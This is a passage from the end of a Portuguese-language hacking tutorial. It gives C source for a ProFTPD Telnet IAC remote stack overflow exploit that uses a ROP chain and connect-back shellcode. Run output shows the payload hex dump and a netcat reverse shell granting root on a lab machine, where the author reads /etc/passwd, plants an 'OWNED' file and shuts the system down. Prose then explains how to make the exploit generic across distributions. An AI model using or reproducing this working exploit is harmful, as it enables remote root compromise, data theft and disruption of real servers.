printf("\n\t [+] Byte5 is located at 0x%08x", byte5_addr);
} else {
printf("\n\t [-] Fail! Could not find Byte5!");
}
index = indexOf(read_buffer, sizeof(read_buffer), byte6, sizeof(byte6)-1);
if(index >= 0){
byte6_addr += (u_int) index;
printf("\n\t [+] Byte6 is located at 0x%08x", byte6_addr);
} else {
printf("\n\t [-] Fail! Could not find Byte6!");
}
index = indexOf(read_buffer, sizeof(read_buffer), byte7, sizeof(byte7)-1);
if(index >= 0){
byte7_addr += (u_int) index;
printf("\n\t [+] Byte7 is located at 0x%08x", byte7_addr);
} else {
printf("\n\t [-] Fail! Could not find Byte7!");
}
index = indexOf(read_buffer, sizeof(read_buffer), byte8, sizeof(byte8)-1);
if(index >= 0){
byte8_addr += (u_int) index;
printf("\n\t [+] Byte8 is located at 0x%08x", byte8_addr);
} else {
printf("\n\t [-] Fail! Could not find Byte8!");
}
index = indexOf(read_buffer, sizeof(read_buffer), byte9, sizeof(byte9)-1);
if(index >= 0){
byte9_addr += (u_int) index;
printf("\n\t [+] Byte9 is located at 0x%08x", byte9_addr);
} else {
printf("\n\t [-] Fail! Could not find Byte9!");
}
} else {
printf("\t [-] Fail! Wrong write(2) offset!\n");
close(sockfd);
}
printf("\n\n\t Building exploit buffer...\n");
bzero(buffer, sizeof(buffer));
memcpy(buffer+OFFSET, "\xff", 1);
memcpy(buffer+OFFSET+1, junk, strlen(junk));
*((u_int *)(buffer+OFFSET+1+PADDING)) = MMAP64;
*((u_int *)(buffer+OFFSET+1+PADDING+4)) = lpr;
memcpy(buffer+OFFSET+1+PADDING+8, mmap64_args, sizeof(mmap64_args));
*((u_int *)(buffer+OFFSET+1+PADDING+52)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+56)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+60, "\x00\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+64)) = byte1_addr;
memcpy(buffer+OFFSET+1+PADDING+68, "\x02\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+72)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+76)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+80, "\x02\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+84)) = byte2_addr;
memcpy(buffer+OFFSET+1+PADDING+88, "\x01\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+92)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+96)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+100, "\x03\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+104)) = byte3_addr;
memcpy(buffer+OFFSET+1+PADDING+108, "\x01\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+112)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+116)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+120, "\x04\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+124)) = byte4_addr;
memcpy(buffer+OFFSET+1+PADDING+128, "\x03\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+132)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+136)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+140, "\x07\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+144)) = byte5_addr;
memcpy(buffer+OFFSET+1+PADDING+148, "\x01\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+152)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+156)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+160, "\x08\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+164)) = byte6_addr;
memcpy(buffer+OFFSET+1+PADDING+168, "\x05\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+172)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+176)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+180, "\x0d\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+184)) = byte7_addr;
memcpy(buffer+OFFSET+1+PADDING+188, "\x01\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+192)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+196)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+200, "\x0e\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+204)) = byte8_addr;
memcpy(buffer+OFFSET+1+PADDING+208, "\x01\x00\x00\x00", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+212)) = MEMCPY;
*((u_int *)(buffer+OFFSET+1+PADDING+216)) = p3r;
memcpy(buffer+OFFSET+1+PADDING+220, "\x0f\x00\x00\x10", 4);
*((u_int *)(buffer+OFFSET+1+PADDING+224)) = byte9_addr;
memcpy(buffer+OFFSET+1+PADDING+228, "\x02\x00\x00\x00", 4);
memcpy(buffer+OFFSET+1+PADDING+232, "\x00\x00\x00\x10", 4);
memset(buffer+OFFSET+1+PADDING+236, '\x90', 205);
memcpy(buffer+OFFSET+1+PADDING+336, shellcode, sizeof(shellcode)-1);
memcpy(buffer+OFFSET+1+PADDING+336+sizeof(shellcode)+9, "\x0a\x0d", 2);
printf("\n\t Too much 00 bytes + evil buffer:\n\n");
dump(buffer+OFFSET-4, sizeof(buffer)-OFFSET+4);
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
fatal("connecting to target server");
printf("\n\t Sending exploit buffer...\n");
write(sockfd, buffer, sizeof(buffer));
close(sockfd);
printf("\n\t [+] Done! Enjoy your fucking shell!!!\n");
printf("\n\n\t\t F0rb1dd3n wins!!!");
printf("\n\t\t Flawless Victory\n");
printf("\n █████▒▄▄▄ ▄▄▄█████▓ ▄▄▄ ██▓ ██▓▄▄▄█████▓▓██ ██▓");
printf("\n ▓██ ▒▒████▄ ▓ ██▒ ▓▒▒████▄ ▓██▒ ▓██▒▓ ██▒ ▓▒ ▒██ ██▒");
printf("\n ▒████ ░▒██ ▀█▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▒██░ ▒██▒▒ ▓██░ ▒░ ▒██ ██░");
printf("\n ░▓█▒ ░░██▄▄▄▄██░ ▓██▓ ░ ░██▄▄▄▄██ ▒██░ ░██░░ ▓██▓ ░ ░ ▐██▓░");
printf("\n ░▒█░ ▓█ ▓██▒ ▒██▒ ░ ▓█ ▓██▒░██████▒░██░ ▒██▒ ░ ░ ██▒▓░");
printf("\n ▒ ░ ▒▒ ▓▒█░ ▒ ░░ ▒▒ ▓▒█░░ ▒░▓ ░░▓ ▒ ░░ ██▒▒▒ ");
printf("\n ░ ▒ ▒▒ ░ ░ ▒ ▒▒ ░░ ░ ▒ ░ ▒ ░ ░ ▓██ ░▒░ ");
printf("\n ░ ░ ░ ▒ ░ ░ ▒ ░ ░ ▒ ░ ░ ▒ ▒ ░░ ");
printf("\n ░ ░ ░ ░ ░ ░ ░ ░ ░ ");
printf("\n ░ ░ ");
printf("\n\n");
}
---------------------------------------------------------------------------------------------
Vamos executar ele e ver o que acontece. O shellcode que estou utilizando é um shellcode
connect back na porta 4444, então não esqueça de deixar o netcat escutando!
let's go hack!!!
---------------------------------------------------------------------------------------------
root@kali:~/Studies# gcc exploit_proftpd.c -o exploit_proftpd
root@kali:~/Studies# ./exploit_proftpd 192.168.25.18 192.168.25.23
Proftpd Telnet IAC remote stack overflow exploit
Writen by: F0rb1dd3n
Target: 192.168.25.18
Trying write(2) offset: 0x080532d8
[+] Success on write(2)
[+] mmap64() is located at 0x08053d18
[+] memcpy() is located at 0x080536c8
Attempting to read memory of the server...
[+] Pop3Ret is located at 0x0805462e
[+] Large PopRet is located at 0x08059a09
[+] Byte1 is located at 0x0805a056
[+] Byte2 is located at 0x0805341a
[+] Byte3 is located at 0x08053f8b
[+] Byte4 is located at 0x080596b3
[+] Byte5 is located at 0x08053314
[+] Byte6 is located at 0x0806a7d8
[+] Byte7 is located at 0x08053c35
[+] Byte8 is located at 0x080532da
[+] Byte9 is located at 0x08054535
Building exploit buffer...
Too much 00 bytes + evil buffer:
00 00 00 00 ff 41 41 41 41 41 41 41 41 41 41 41 | .....AAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 18 3d 05 08 09 9a 05 08 00 | AAAAAAA.=.......
00 00 10 00 10 00 00 07 00 00 00 32 00 00 00 ff | ...........2....
ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 00 00 00 00 00 00 c8 36 05 08 2e | ............6...
46 05 08 00 00 00 10 56 a0 05 08 02 00 00 00 c8 | F......V........
36 05 08 2e 46 05 08 02 00 00 10 1a 34 05 08 01 | 6...F.......4...
00 00 00 c8 36 05 08 2e 46 05 08 03 00 00 10 8b | ....6...F.......
3f 05 08 01 00 00 00 c8 36 05 08 2e 46 05 08 04 | ?.......6...F...
00 00 10 b3 96 05 08 03 00 00 00 c8 36 05 08 2e | ............6...
46 05 08 07 00 00 10 14 33 05 08 01 00 00 00 c8 | F.......3.......
36 05 08 2e 46 05 08 08 00 00 10 d8 a7 06 08 05 | 6...F...........
00 00 00 c8 36 05 08 2e 46 05 08 0d 00 00 10 35 | ....6...F......5
3c 05 08 01 00 00 00 c8 36 05 08 2e 46 05 08 0e | <.......6...F...
00 00 10 da 32 05 08 01 00 00 00 c8 36 05 08 2e | ....2.......6...
46 05 08 0f 00 00 10 35 45 05 08 02 00 00 00 00 | F......5E.......
00 00 10 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 31 c0 31 db 31 c9 b0 46 cd | .......1.1.1..F.
80 90 90 90 6a 66 58 6a 01 5b 31 c9 51 6a 01 6a | ....jfXj.[1.Qj.j
02 89 e1 cd 80 68 c0 a8 19 17 66 68 11 5c 66 6a | .....h....fh.\fj
02 89 e1 6a 10 51 50 89 e1 89 c6 6a 03 5b 6a 66 | ...j.QP....j.[jf
58 cd 80 87 f3 6a 02 59 b0 3f cd 80 49 79 f9 b0 | X....j.Y.?..Iy..
0b 31 d2 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 | .1.Rh//shh/bin..
52 53 89 e1 cd 80 90 90 90 90 90 90 90 90 90 90 | RS..............
0a 0d | ..
Sending exploit buffer...
[+] Done! Enjoy your fucking shell!!!
F0rb1dd3n wins!!!
Flawless Victory
█████▒▄▄▄ ▄▄▄█████▓ ▄▄▄ ██▓ ██▓▄▄▄█████▓▓██ ██▓
▓██ ▒▒████▄ ▓ ██▒ ▓▒▒████▄ ▓██▒ ▓██▒▓ ██▒ ▓▒ ▒██ ██▒
▒████ ░▒██ ▀█▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▒██░ ▒██▒▒ ▓██░ ▒░ ▒██ ██░
░▓█▒ ░░██▄▄▄▄██░ ▓██▓ ░ ░██▄▄▄▄██ ▒██░ ░██░░ ▓██▓ ░ ░ ▐██▓░
░▒█░ ▓█ ▓██▒ ▒██▒ ░ ▓█ ▓██▒░██████▒░██░ ▒██▒ ░ ░ ██▒▓░
▒ ░ ▒▒ ▓▒█░ ▒ ░░ ▒▒ ▓▒█░░ ▒░▓ ░░▓ ▒ ░░ ██▒▒▒
░ ▒ ▒▒ ░ ░ ▒ ▒▒ ░░ ░ ▒ ░ ▒ ░ ░ ▓██ ░▒░
░ ░ ░ ▒ ░ ░ ▒ ░ ░ ▒ ░ ░ ▒ ▒ ░░
░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
---------------------------------------------------------------------------------------------
Em outra shell: -----------------------------------------------------------------------------
root@kali:~# nc -lnvp 4444
nc: listening on :: 4444 ...
nc: listening on 0.0.0.0 4444 ...
nc: connect to 192.168.25.23 4444 from 192.168.25.18 55610
uname -a
Linux ubuntu 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC 2010 i686 GNU/Linux
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:e4:38:55
inet addr:192.168.25.18 Bcast:192.168.25.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee4:3855/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:28011 errors:0 dropped:0 overruns:0 frame:0
TX packets:4889 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2694445 (2.6 MB) TX bytes:1370853 (1.3 MB)
Interrupt:19 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:52 errors:0 dropped:0 overruns:0 frame:0
TX packets:52 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4568 (4.5 KB) TX bytes:4568 (4.5 KB)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
usbmux:x:106:46:usbmux daemon,,,:/home/usbmux:/bin/false
speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:109:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:110:117:RealtimeKit,,,:/proc:/bin/false
saned:x:111:118::/home/saned:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:113:120:Gnome Display Manager:/var/lib/gdm:/bin/false
neo:x:1000:1000:Matrix,,,:/home/neo:/bin/bash
proftpd:x:114:65534::/var/run/proftpd:/bin/false
ftp:x:115:65534::/home/ftp:/bin/false
echo "hacked by F0rb1dd3n" > /home/neo/Desktop/OWNED
cat /home/neo/Desktop/OWNED
hacked by F0rb1dd3n
shutdown -h now
----------------------------------------------------------------------------------------------
Own3d!!! F0rb1dd3n wins! Agora tudo isso parece tão fácil, não? Hacking é uma arte, basta
enchergarmos a beleza na execução dos bytes!
Vale ressaltar algumas coisas:
Como proposto pelo Kingcope no seu artigo sobre a exploração genérica do nginx para linux
systems, podemos utilizar a syscall ioctl() para ler mais memória do servidor com a chamada
de write(2). Seria algo assim:
-> ioctl plt offset
-> endereço "pop pop pop ret" gadget
-> argumentos ioctl
-> write(2) plt offset
-> argumentos para write(2)
Para efetuarmos um exploit mais genérico, podemos tentar descobrir o endereço de write(2)
fazendo bruteforce em um endereço de memória inicial incrementando em 4. Quando recebermos
os bytes, é pq achamos write(2).
Em cada chamada de biblioteca há uma instrução "jmp" que aponta para a GOT (Global Offset
Table). Com os bytes \xff\x25 podemos verificar o ponteiro para a GOT (que são os próximos
4 bytes depois de \xff\x25). Com esse ponteiro podemos passar como parâmetro de buffer para
uma chamada write(2) para poder ler os bytes da biblioteca chamada pelo processo. Podemos
extrair o prefixo das funções mmap64 e memcpy usando o "objdump" ou debuggando a aplicação,
então basta fazer a mesma coisa que fizemos antes: comparar. Comparando os bytes do prefixo
das funções com os bytes das bibliotecas lidos, conseguimos achar o endereço correto de
mmap64 e memcpy (assim como fizemos para acharmos os gadgets de pop pop pop ret). Essa é uma
maneira eficaz. Uma outra forma de encontrarmos os endereços corretos de mmap64 e memcpy é
comparando os bytes dos prefixos das chamadas das funções pelo processo da aplicação
em busca de acharmos a instrução de chamada de mmap64 e memcpy (call "address"). Isso também
é outra maneira de encontrarmos os reais offsets das funções. Isso pode parecer um pouco
complicado, mas ao debugar a aplicação isso se torna mais claro. Ou seja, é possivel fazer
um exploit generalizado que poderá rodar em qualquer distribuição alvo. Assim asseguramos
que teremos sempre sucesso na exploração desta falha.
Então é isso pessoal! Espero que o leitor tenha gostado e ampliado seus conhecimentos.
Qualquer dúvida, podem entrar em contato no meu e-mail f0rb1@hotmail.com.
Um abraço,
F0rb1dd3n
|=-------------------------------------------------------------------------------------=|
Referências:
Scraps of notes on remote stack overflow exploitation - by pi3
http://phrack.org/issues/67/13.html#article
Uncovering Zero-Days and advanced fuzzing - by Kingcope
http://www.exploit-db.com/docs/18924.pdf
nginx Exploit Documentation About a Generic Way to Exploit Linux Targets - by Kingcope
http://www.exploit-db.com/docs/27074.pdf
Return Oriented Programming and ROPgadget tool - by Jonathan Salwan
http://shell-storm.org/blog/Return-Oriented-Programming-and-ROPgadget-tool/
|=-------------------------------------------------------------------------------------=|
